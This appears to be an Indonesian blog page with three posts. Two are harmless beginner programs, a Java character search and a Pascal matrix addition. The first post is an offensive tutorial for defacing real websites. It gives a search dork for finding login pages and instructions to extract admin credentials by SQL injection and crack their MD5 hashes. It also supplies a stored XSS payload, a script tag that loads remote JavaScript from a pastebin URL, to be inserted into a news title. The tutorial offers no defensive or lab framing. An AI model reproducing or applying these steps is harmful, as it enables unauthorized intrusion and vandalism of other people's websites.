skip to main | skip to sidebar

Wednesday 3 July 2019

Deface Website dengan XSS dan SQLi

Posted by Ven at 19:39
0 comments
Pada materi sebelumnya sudah dijelaskan mengenai XSS dan juga SQL Injection. Sekarang kita gunakan dua metode tersebut untuk mendeface sebuah website. Biasanya setelah kita login sebagai admin terkadang panel adminnya mempunyai fitur yang sangat terbatas seperti contoh menambahkan berita, galeri dan informasi yang lain. Sekarang kita akan mendeface website dengan dua metode tersebut. SQL Injection digunakan untuk melihat akun admin dan XSS digunakan untuk mengubah tampilan website.



Seperti biasa saya tidak akan memberikan target tertentu. Untuk mencari website-website yang memiliki form login bisa gunakan dork ini.

inurl: login

Tutorial SQL Injection kalian bisa kunjungi materi SQL Injection dan untuk XSS bisa kunjungi materi XSS yang sudah tersedia. Kalau kalian sudah berhasil menemukan username dan password admin, cek terlebih dahulu apakah passwordnya terenkripsi atau tidak, biasanya password di enkripsi dengan MD5. Password yang di enkripsi MD5 bisa kalian dekripsi dengan tools yang beredar di internet salah satunya adalah MD5 Online.

Masukan password yang terenkripsi ke kalam kotak yang disediakan kan klik tombol Decrypt, tunggu hingga proses nya selesai.

Biasanya website terdapat berita atau informasi lain yang dimunculkan di halaman utama website. Nah, itu akan kita jadikan sebagai target deface website tanpa mengubah file indexnya.


Setelah kalian masuk ke panel Admin kalian bisa mengganti atau menambahkan berita dengan disisipkan script deface. Kalian bisa menggunakan script deface dari saya. Masukan payload XSS ke judul berita.

Payload : <script type="text/javascript" src="https://pastebin.com/raw/xqcAm4nU">

Simpan beritanya dan kunjungi halaman utama website. Jika berhasil website akan berganti tampilan.


Jika ada yang belum dimengerti silahkan tulis dikolom komentar atau kirim pesan pada kontak yang tersedia. Sekian untuk materi kali ini, semoga bermanfaat dan sampai jumpa pada materi berikutnya.

Pencarian Karakter Pada Array - Java

Posted by Ven at 14:39
0 comments
Lagi-lagi dari branly saya melihat ada membuat pertanyaan untuk membuat sebuah program untuk mencari sebuah character dalam susunan array yang berisi banyak character. Character yang dicari diinputkan secara manual, jika ada character dalah susunan array tadi maka akan ditampilkan "ADA" dan ditampilkan juga berapa banyaknya, jika tidak ada maka ditampilkan tulisan "TIDAK ADA".


Algoritma :
1. Array Char -> [B][U][D][I][ ][L][U][H][U][R]
2. jumlah -> 0, untuk menyimpan jumlah character yang ditemukan.
3. kata -> diambil dari inputan.
4. Kata yang dicari dibandingkan dengan setiap character di dalam array sampai character yang terakhir, jika ada maka jumlah akan ditambah 1.
5. Jika jumlah lebih dari 0, tampilkan "ADA" dan tampilkan jumlah.
6. Jika jumlah sama dengan 0, tampilkan "TIDAK ADA".

Source Kode Program dengan Bahasa Java.

package testbrainly;

import java.util.Scanner;
/**
 * @author Ven DS
 */
public class TestBrainly {
    public static void main(String[] args) {
        Scanner scan = new Scanner(System.in);
       
        char data1[] = {'B', 'U', 'D', 'I', ' ', 'L', 'U', 'H', 'U', 'R'};
        int cariJumlah = 0; // Menampung jumlah huruf yang ditemukan
       
        System.out.print("Masukan Huruf yang Dicari - ");
       
        // charAt(0), hanya huruf pertama yang diambil dari inputan
        char cariKata = (scan.nextLine()).charAt(0);
       
        // Pencarian Huruf
        for(int z = 0; z < data1.length; z++) {
            // Jika ada huruf yang cocok cariJumlah + 1
            if(cariKata == data1[z]) {
                cariJumlah++;
            }
        }
       
        if(cariJumlah > 0) {
            System.out.println("ADA");
            System.out.println(cariJumlah);
        }
        else {
            System.out.println("TIDAK ADA");
        }
    }
}

Output dari program nya seperti ini.



Untuk pertanyaan seputar bahasa pemrograman bisa kalian tanyakan di Brainly atau kontak yang tersedia, saya akan berusaha untuk menjelaskannya dengan detail. Sekian untuk materi kali ini, sampai jumpa pada materi berikutnya.

Program Penjumalahan Matriks - Pascal

Posted by Ven at 01:05
0 comments
Saya menemukan pertanyaan di website Brainly.co.id yang pastinya tentang TI yaitu membuat sebuah program untuk menghitung matrik. Matrik 1 ditambahkan Matrik 2 dan hasilnya di tampilkan. Bahasa pemrograman yang digunakan adalah Pascal.


Untuk kode programnya sendiri seperti ini dan cukup simple, saya hanya akan menjelaskan di bagian perulangan ( FOR ) saja. Perulangan yang digunakan adalah Nested Loop atau perulangan yang bersarang atau perulangan yang berada didalam perulangan.

program matriks_ku;
uses crt;
var
   {* Variable Matrik 1 *}
   matrik1: array[0..2,0..2] of integer;

   {* Variable Matrik 2 *}
   matrik2: array[0..2,0..2] of integer;

   {* Variable Hasil Penjumlahan Matrik *}
   matrikH: array[0..2,0..2] of integer;

   { * Variable untuk Perulangan *}
   i: integer;
   j: integer;

begin
     clrscr;

     matrik1[0,0]:= 1;
     matrik1[0,1]:= 2;
     matrik1[1,0]:= 2;
     matrik1[1,1]:= 3;

     matrik2[0,0]:= 2;
     matrik2[0,1]:= 2;
     matrik2[1,0]:= 3;
     matrik2[1,1]:= 2;

     for i:=0 to 1 do begin
         for j:= 0 to 1 do begin
             matrikH[i,j]:= matrik1[i,j] + matrik2[i,j];
         end;
     end;

     writeln('Hasil Penjumlahan Matrik');

     for i:=0 to 1 do begin
         for j:= 0 to 1 do begin
             write(matrikH[i,j],' ');
         end;
         writeln('');
     end;

     readln;
end.

Sebelumnya perlu diketahui terlebih dahulu untuk penggunaan array 2 dimensi. Array 2D bekerja seperi table yang ada didalam Microsoft Excel ada kolom dan ada baris. Didalam array selalu diawali dengan index atau uratan ke 0 seperti didalam gambar.


Logika Nested Loop didalam program. Contoh Array menggunakan variable Matrik1.
Array Matrik1 =
[1, 2]
[2, 3]

FOR yang pertama untuk baris dari array.
FOR yang kedua untuk kolom dari array.

for -> i ke 0 -> baris array yang diambil adalah [1, 2]
    for -> j ke 0 -> mengambil nilai index ke 0 -> yaitu 1
    for -> j ke 1 -> mengambil nilai index ke 1 -> yaitu 2
for -> i ke 1 -> baris array yang diambil adalah [2, 3]
    for -> j ke 0 -> mengambil nilai index ke 0 -> yaitu 2
    for -> j ke 1 -> mengambil nilai index ke 1 -> yaitu 3

Output Program


Untuk pertanyaan seputar bahasa pemrograman bisa kalian tanyakan di Brainly, saya akan berusaha untuk menjelaskannya dengan detail. Sekian untuk materi kali ini, sampai jumpa pada materi berikutnya.
Subscribe to: Posts (Atom)